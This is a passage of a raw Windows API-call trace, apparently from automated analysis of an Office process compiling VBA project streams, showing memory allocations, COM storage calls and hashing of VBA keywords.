(_Block=0x2fcdfb0) [0067.961] free (_Block=0x2fcdf90) [0067.961] free (_Block=0x25187f0) [0067.961] free (_Block=0x25187c0) [0067.961] free (_Block=0x25193b0) [0067.961] free (_Block=0x2519390) [0067.961] free (_Block=0x2518850) [0067.961] free (_Block=0x2518820) [0067.961] free (_Block=0x25193f0) [0067.961] free (_Block=0x25193d0) [0067.961] free (_Block=0x25188b0) [0067.961] free (_Block=0x2518880) [0067.961] free (_Block=0x2518470) [0067.961] CExposedStream::Commit () returned 0x0 [0067.962] CExposedStream::Release () returned 0x0 [0067.962] CExposedDocFile::OpenStream () returned 0x80030002 [0067.962] lstrcmpiA (lpString1="Host Extender Info", lpString2="Host Extender Info") returned 0 [0067.962] lstrlenA (lpString="&H00000001") returned 10 [0067.962] malloc (_Size=0xb) returned 0x2519b10 [0067.962] lstrcmpiA (lpString1="Host Extender Info", lpString2="Host Extender Info") returned 0 [0067.962] lstrcmpiA (lpString1="&H00000001", lpString2="&H00000001") returned 0 [0067.962] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0067.962] malloc (_Size=0x36) returned 0x2fcdf90 [0067.963] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0067.963] malloc (_Size=0x68) returned 0x2519390 [0067.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2fcdf90, cbMultiByte=-1, lpWideCharStr=0x1477d0, cchWideChar=39 | out: lpWideCharStr="{3832D640-CF90-11CF-8E43-00A0C911005A}") returned 39 [0067.963] CLSIDFromString (in: lpsz="{3832D640-CF90-11CF-8E43-00A0C911005A}", pclsid=0x25193bc | out: pclsid=0x25193bc*(Data1=0x3832d640, Data2=0xcf90, Data3=0x11cf, Data4=([0]=0x8e, [1]=0x43, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x5a))) returned 0x0 [0067.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2fcdfb7, cbMultiByte=-1, lpWideCharStr=0x1477c0, cchWideChar=4 | out: lpWideCharStr="VBE") returned 4 [0067.963] free (_Block=0x2fcdf90) [0067.963] free (_Block=0x2519b10) [0067.963] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0067.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6884528, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0067.963] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0067.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6884528, cbMultiByte=8, lpWideCharStr=0x6885c98, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0067.963] lstrlenA (lpString="Project") returned 7 [0067.963] GetCurrentThreadId () returned 0x8ec [0067.963] malloc (_Size=0x50) returned 0x251af00 [0067.964] GetCurrentThreadId () returned 0x8ec [0067.964] IMalloc:Alloc (This=0x7fefec05380, cb=0x28) returned 0x682e430 [0067.964] GetCursorPos (in: lpPoint=0x147a30 | out: lpPoint=0x147a30*(x=1328, y=694)) returned 1 [0067.964] GetCapture () returned 0x0 [0067.964] WindowFromPoint (Point=0x2b600000530) returned 0x40154 [0067.964] GetWindowThreadProcessId (in: hWnd=0x40154, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x8ec [0067.964] SendMessageA (hWnd=0x40154, Msg=0x84, wParam=0x0, lParam=0x2b60530) returned 0x1 [0067.964] SendMessageA (hWnd=0x40154, Msg=0x20, wParam=0x40154, lParam=0x2000001) returned 0x0 [0067.965] free (_Block=0x2fcd050) [0067.965] free (_Block=0x2fccfc0) [0067.965] malloc (_Size=0x98) returned 0x2fccfc0 [0067.966] malloc (_Size=0x20) returned 0x2518880 [0067.966] malloc (_Size=0x98) returned 0x2518470 [0067.967] malloc (_Size=0x98) returned 0x2518510 [0067.971] malloc (_Size=0xc8) returned 0x25185b0 [0067.972] SetCursor (hCursor=0x10007) returned 0x10007 [0067.972] malloc (_Size=0x3f0) returned 0x251af60 [0067.973] malloc (_Size=0x60) returned 0x2fcd060 [0067.974] GetCurrentThreadId () returned 0x8ec [0067.974] GetCurrentThreadId () returned 0x8ec [0067.974] malloc (_Size=0x20) returned 0x2518850 [0067.974] malloc (_Size=0x818) returned 0x251b360 [0067.974] malloc (_Size=0x818) returned 0x251bb80 [0067.974] malloc (_Size=0x60) returned 0x2518680 [0067.974] malloc (_Size=0xa8) returned 0x251c3a0 [0067.974] CExposedDocFile::CreateStorage () returned 0x0 [0067.974] IMalloc:Alloc (This=0x7fefec05380, cb=0x280) returned 0x6a6e750 [0067.974] GetLocalTime (in: lpSystemTime=0x1472e8 | out: lpSystemTime=0x1472e8*(wYear=0x7e3, wMonth=0x4, wDayOfWeek=0x0, wDay=0xe, wHour=0xe, wMinute=0x25, wSecond=0x5, wMilliseconds=0xa2)) [0067.974] _ultow_s (in: _Value=0x5e95ca91, _Buffer=0x6a6e77a, _BufferCount=0x103, _Radix=16 | out: _Buffer="5e95ca91") returned 0x0 [0067.974] wcsncpy_s (in: _Destination=0x146fb0, _SizeInWords=0x108, _Source="*\\Z045e95ca91", _MaxCount=0x106 | out: _Destination="*\\Z045e95ca91") returned 0x0 [0067.974] CharLowerBuffW (in: lpsz="*\\Z045e95ca91", cchLength=0xd | out: lpsz="*\\z045e95ca91") returned 0xd [0067.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z045e95ca91", cchWideChar=14, lpMultiByteStr=0x146ee0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z045e95ca91", lpUsedDefaultChar=0x0) returned 14 [0067.974] wcscpy_s (in: _Destination=0xaf2e320, _SizeInWords=0xe, _Source="*\\Z045e95ca91" | out: _Destination="*\\Z045e95ca91") returned 0x0 [0067.974] wcsncpy_s (in: _Destination=0x146ff0, _SizeInWords=0x108, _Source="*\\Z045e95ca91", _MaxCount=0x106 | out: _Destination="*\\Z045e95ca91") returned 0x0 [0067.974] CharLowerBuffW (in: lpsz="*\\Z045e95ca91", cchLength=0xd | out: lpsz="*\\z045e95ca91") returned 0xd [0067.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z045e95ca91", cchWideChar=14, lpMultiByteStr=0x146f20, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z045e95ca91", lpUsedDefaultChar=0x0) returned 14 [0067.974] CExposedDocFile::AddRef () returned 0x2 [0067.975] CExposedDocFile::AddRef () returned 0x2 [0067.975] wcscpy_s (in: _Destination=0xaf60d40, _SizeInWords=0x7, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0067.975] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x180) returned 0x6944ab0 [0067.975] IMalloc:Alloc (This=0x7fefec05380, cb=0xb8) returned 0xaf03110 [0067.975] IMalloc:Alloc (This=0x7fefec05380, cb=0xb8) returned 0xaf03050 [0067.975] IMalloc:Alloc (This=0x7fefec05380, cb=0x230) returned 0x6a18760 [0067.975] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x80) returned 0xaf60df0 [0067.975] IMalloc:Alloc (This=0x7fefec05380, cb=0x230) returned 0x6a189b0 [0067.975] IMalloc:Alloc (This=0x7fefec05380, cb=0x230) returned 0x6a18c00 [0067.975] IMalloc:Alloc (This=0x7fefec05380, cb=0x28) returned 0x682e6a0 [0067.975] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x64ef2e0 [0067.975] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x146c5c, cchData=6 | out: lpLCData="1252") returned 5 [0067.975] atoi (_Str="1252") returned 1252 [0067.975] GetLocalTime (in: lpSystemTime=0x146c50 | out: lpSystemTime=0x146c50*(wYear=0x7e3, wMonth=0x4, wDayOfWeek=0x0, wDay=0xe, wHour=0xe, wMinute=0x25, wSecond=0x5, wMilliseconds=0xa2)) [0067.975] IMalloc:Alloc (This=0x7fefec05380, cb=0x80) returned 0xaf60e80 [0067.975] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a598d0 [0067.975] IMalloc:Alloc (This=0x7fefec05380, cb=0x80) returned 0xaf60f10 [0067.975] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x682e6d0 [0067.975] IMalloc:Alloc (This=0x7fefec05380, cb=0x80) returned 0xaf60fa0 [0067.975] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf60fa0, cb=0x280) returned 0x6a6e9e0 [0067.975] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a598e0 [0067.975] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a598f0 [0067.975] VirtualAlloc (lpAddress=0x0, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x3dd0000 [0067.976] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x2000, flProtect=0x4) returned 0x3e60000 [0067.976] CExposedDocFile::CreateStream () returned 0x0 [0067.976] IMalloc:Alloc (This=0x7fefec05380, cb=0x420) returned 0x69f9090 [0067.976] CExposedStream::AddRef () returned 0x2 [0067.976] CExposedStream::Release () returned 0x1 [0067.977] CExposedStream::Release () returned 0x0 [0067.977] IMalloc:Free (This=0x7fefec05380, pv=0x69f9090) [0067.977] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0067.977] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x30) returned 0x646f830 [0067.977] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x42b0000 [0067.977] VirtualAlloc (lpAddress=0x3e60000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x3e60000 [0067.978] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Abs") returned 0x1072bc [0067.978] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Access") returned 0x101d98 [0067.978] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AddressOf") returned 0x10e252 [0067.978] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Alias") returned 0x10bf6d [0067.978] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0067.978] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Any") returned 0x10747a [0067.978] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Append") returned 0x108f83 [0067.978] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Array") returned 0x109183 [0067.978] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0067.978] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Assert") returned 0x1096e9 [0067.978] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="B") returned 0x101059 [0067.978] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Base") returned 0x10afa9 [0067.978] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BF") returned 0x105ca5 [0067.978] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Binary") returned 0x1008a0 [0067.978] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Boolean") returned 0x10978e [0067.978] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByRef") returned 0x1074ef [0067.978] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Byte") returned 0x101a83 [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByVal") returned 0x1089c5 [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Call") returned 0x10744b [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Case") returned 0x107547 [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CBool") returned 0x104c74 [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CByte") returned 0x106d3c [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CCur") returned 0x108050 [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDate") returned 0x108dc3 [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDec") returned 0x10834a [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDbl") returned 0x1082e4 [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDecl") returned 0x10a0b9 [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ChDir") returned 0x10b2fb [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CInt") returned 0x109f65 [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Circle") returned 0x103fd1 [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLng") returned 0x10af63 [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Close") returned 0x1005ab [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Compare") returned 0x10af82 [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Const") returned 0x10517a [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CSng") returned 0x10d4d2 [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CStr") returned 0x10d5bb [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir") returned 0x101bab [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir$") returned 0x10f7cc [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir") returned 0x101bab [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVar") returned 0x10e307 [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVDate") returned 0x10cfd6 [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVErr") returned 0x108902 [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Currency") returned 0x10f106 [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Database") returned 0x10eec7 [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date") returned 0x103b0a [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date$") returned 0x1031c7 [0067.979] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date") returned 0x103b0a [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Debug") returned 0x10eaee [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Decimal") returned 0x1036dd [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Declare") returned 0x104a38 [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefBool") returned 0x1091ad [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefByte") returned 0x10b275 [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefCur") returned 0x10cc45 [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDate") returned 0x10d2fc [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDec") returned 0x10cf3f [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDbl") returned 0x10ced9 [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefInt") returned 0x10eb5a [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLng") returned 0x10fb58 [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefObj") returned 0x10096b [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefSng") returned 0x102088 [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefStr") returned 0x102171 [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefVar") returned 0x102ebd [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir") returned 0x1083c9 [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir$") returned 0x106567 [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir") returned 0x1083c9 [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Do") returned 0x105cf8 [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DoEvents") returned 0x109634 [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Double") returned 0x100d99 [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Each") returned 0x10fe75 [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Else") returned 0x103b56 [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ElseIf") returned 0x10f307 [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Empty") returned 0x10f4f1 [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EndIf") returned 0x1078bd [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Enum") returned 0x10465a [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Eqv") returned 0x108a4e [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Erase") returned 0x1080da [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error$") returned 0x10cf60 [0067.980] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Error") returned 0x10db3c [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Event") returned 0x10ac4b [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Exit") returned 0x107a1f [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Explicit") returned 0x10edcb [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="F") returned 0x10105d [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="False") returned 0x102d01 [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Fix") returned 0x108e81 [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="For") returned 0x108f59 [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format") returned 0x102337 [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format$") returned 0x10efc7 [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Format") returned 0x102337 [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="FreeFile") returned 0x10483a [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Friend") returned 0x10bd1c [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Get") returned 0x109342 [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Global") returned 0x10f88f [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Go") returned 0x105d67 [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoSub") returned 0x10b425 [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GoTo") returned 0x10d70b [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Imp") returned 0x109f18 [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Implements") returned 0x10a988 [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="In") returned 0x105db0 [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input") returned 0x10022a [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input$") returned 0x107767 [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Input") returned 0x10022a [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB") returned 0x107785 [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB$") returned 0x100c59 [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InputB") returned 0x107785 [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InStr") returned 0x10120e [0067.981] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="InStrB") returned 0x10c2fb [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Int") returned 0x109f41 [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Integer") returned 0x10b48a [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Is") returned 0x105db5 [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LBound") returned 0x101e0b [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Left") returned 0x107be5 [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Len") returned 0x10adf9 [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LenB") returned 0x107cfb [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Let") returned 0x10adff [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Lib") returned 0x10ae81 [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Like") returned 0x1091f3 [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Line") returned 0x109262 [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LINEINPUT") returned 0x1008f1 [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Load") returned 0x10b096 [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Local") returned 0x10353f [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Lock") returned 0x10b0e7 [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Long") returned 0x10b27a [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Loop") returned 0x10b2a8 [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LSet") returned 0x10c69e [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Me") returned 0x105e3b [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid$") returned 0x10566d [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mid") returned 0x10b3dc [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB") returned 0x10568b [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB$") returned 0x102a70 [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MidB") returned 0x10568b [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mod") returned 0x10b4ba [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module") returned 0x101ee1 [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Name") returned 0x10f2f0 [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="New") returned 0x10b8b3 [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Next") returned 0x1009bb [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Not") returned 0x10ba23 [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Nothing") returned 0x105f21 [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Null") returned 0x105d87 [0067.982] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Object") returned 0x102ec1 [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="On") returned 0x105e8e [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Open") returned 0x100767 [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Option") returned 0x10f982 [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Optional") returned 0x10675a [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Or") returned 0x105e92 [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Output") returned 0x10f959 [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ParamArray") returned 0x105941 [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Preserve") returned 0x10a5fc [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Print") returned 0x10f00d [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Private") returned 0x1073c3 [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Property") returned 0x10d2f6 [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PSet") returned 0x10dd55 [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Public") returned 0x101287 [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Put") returned 0x10c5b3 [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RaiseEvent") returned 0x10274a [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Random") returned 0x10f428 [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Randomize") returned 0x10ab02 [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Read") returned 0x101d0f [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ReDim") returned 0x10eea8 [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rem") returned 0x10ce0e [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Resume") returned 0x10728b [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Return") returned 0x1038eb [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RGB") returned 0x10ce4d [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RSet") returned 0x106891 [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Scale") returned 0x10e596 [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Seek") returned 0x10e387 [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Select") returned 0x10cabd [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Set") returned 0x10d36e [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sgn") returned 0x10d3b2 [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Shared") returned 0x10479e [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Single") returned 0x10a99f [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Spc") returned 0x10d4f4 [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Static") returned 0x1029c6 [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Step") returned 0x103384 [0067.983] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Stop") returned 0x1034f6 [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="StrComp") returned 0x10274d [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String$") returned 0x10c31c [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="String") returned 0x10102a [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Sub") returned 0x10d5ac [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Tab") returned 0x10d821 [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text") returned 0x10abed [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="To") returned 0x105f48 [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="True") returned 0x10f0f4 [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Type") returned 0x100007 [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TypeOf") returned 0x101832 [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="UBound") returned 0x10ea71 [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unload") returned 0x104e44 [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unlock") returned 0x104e95 [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Unknown") returned 0x10a11d [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Until") returned 0x10ecec [0067.984] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Variant") returned 0x108738 [0067.984] LHashValOfNameSysA (syskind=0x3, 